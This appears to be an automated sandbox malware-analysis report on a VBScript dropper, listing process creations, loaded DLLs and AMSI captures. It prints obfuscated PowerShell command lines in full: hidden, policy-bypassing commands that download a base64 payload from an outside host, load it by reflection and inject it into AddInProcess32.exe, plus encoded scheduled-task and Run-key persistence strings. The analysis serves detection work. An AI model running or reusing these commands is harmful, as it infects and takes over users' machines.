'OMBKFEUb53tutFKThka2RGNcYYs2ulk8vTmyCrog7l2O3RwQrlh7A68ld4FrbO79G2CKqjyugPHEhll9y0oYUUDtEgxS/TTrkLgr6rRgAN2mhGi60VpovjK8PwCaB96INC5Lx0Q4jjRqRoQeEkRN7oznCcSH9S5hIMTzAM601+jMg5rlddA8BQMrDFUNBsPal7E/enYJ1/DgMtNAs1llUG1fx07mT718iBKCPA0UgDugyF0YNnGWXsx6L48azkMWu3ZZPlPZ8mcepI3lvx3TMpghQf8HEa4/yjrpt9Y9YDk=', 'QeDFFI8c8r5XtEVKt+FKF+pYH/R3f3A4ggcEqRejLKuJbBibHNyZwxQQVrrNKwTawmAb185vWUyXXJUI+NLTpg=='
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, NormalStartup.cs	Base64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@8/7@2/3

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Dggx_gg

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4c1vj0if.ura.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1iH5ABLKIA.vbs

Virustotal: Detection: 8%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msvfw32.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCc", "0", "false");

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0